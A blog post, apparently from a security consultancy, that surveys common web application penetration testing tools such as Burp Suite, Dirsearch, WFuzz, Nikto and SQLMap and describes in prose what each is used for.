Penetration testing is an extremely dynamic field. There is very little standardization in the tools, processes, and techniques that different organizations leverage when performing testing. Web application penetration testing is no different, so we’re going to cover some of the most common web application penetration testing tools in our toolkit.
This disparity in tools is probably due to the different goals of test teams (traditional pen test to red team to bug bounty), the constantly changing nature of security, and the lack of an international standard in penetration testing processes (there are a ton of different, individual standards). Even an individual penetration tester’s background and preferences play in to the tooling they are going to use as part of an assessment: Do they have a budget to buy top tier tools (think Cobalt Strike or AppScan) or are they leveraging open source? Do they have a background in programming/scripting and want to write their own or do they need to take what they can get from GitHub?
In any case, when it comes to web application penetration testing tools, there are many different options/approaches that are equally valid and will vary based on the details of your target. Ultimately, the tool does not make the tester. But it is helpful to understand the types of tools that are out there if you are a tester yourself. It’s also good if you are engaging someone to perform a web application penetration test to understand what that testing organization is going to use against your application. Let’s run through a few:
Burp Suite Professional
This is almost always numero uno and is definitely my primary web application penetration testing tool. Burp Suite (with a Professional license) is one of the most useful and versatile tools in a web application penetration testers toolkit and I don’t know many people that don’t feature it as their main tool when it comes to applications. Burp Suite is an intercepting proxy and vulnerability scanner that can do just about anything you need to do during a penetration test, all through one interface. It can perform content discovery, directory brute forcing, manual request manipulation, automated fuzzing, password attacks, etc. And then on top of that, it’s extremely extensible with an entire third-party app store dedicated to more niche penetration testing add-ons and can support the development of custom add-ons for specific scenarios.
I know I just said that Burp Suite can do almost anything, but there are still other tools that are useful in tandem to either provide a different perspective or run more efficiently. Dirsearch.py is an open source option for content discovery using directory brute forcing. I personally prefer this over Dirb, Dirbuster, and GoBuster due to its ease-of-use and clear/concise output. All directory brute forcing options are extremely similar in functionality, so it mostly comes down to your chosen wordlists/configuration options.
Similarly, WFuzz is a fuzzing tool that provides a little more flexibility beyond the content discovery options I just listed. It provides the ability to run multiple wordlists and specify custom insertion locations for fuzzing, which allows you to do things like fuzz headers, extensions, sub-domains, virtual hosts, etc. The configuration options have a little steeper learning curve but it’s well worth it.
Nikto is an open source web server vulnerability scanner that can quickly identify low-hanging vulnerabilities and items of interest during a web application penetration test. Burp Suite now covers most of these vulnerabilities, but Nikto continues to perform well at identify indicators of more niche vulnerabilities by checking for specific fingerprints associated with them. This can often lead to a critical issue that might otherwise have gone unnoticed.
While most of the other web application penetration testing tools we’ve mentioned so far are centered around vulnerability discovery, SQLMap generally comes in handy more during the exploitation phase. While it certainly can be used to identify SQL injection vulnerabilities from scratch, I used it for exploiting a SQL injection issue I’ve already identified and confirmed manually. As a free tool, it is extremely stable and feature rich, providing you with a vast number of options for exploitation. With a single command, you can dump an entire database or even obtain a full shell using any type of SQLi on any type of back-end relational database.
While this is certainly not an exhaustive list, as you can imagine, this should provide a really solid understanding of some of the most common/useful web application penetration testing tools you’ll see used during an assessment. Custom scripts and other tools almost always come into play, as well, but their usage is highly dependent on the specific target architecture or more niche vulnerabilities. If you’d like to understand more about how we conduct web application penetration testing, check out our high-level methodology or reach out if you’d like to hear more about the benefits of web application penetration testing.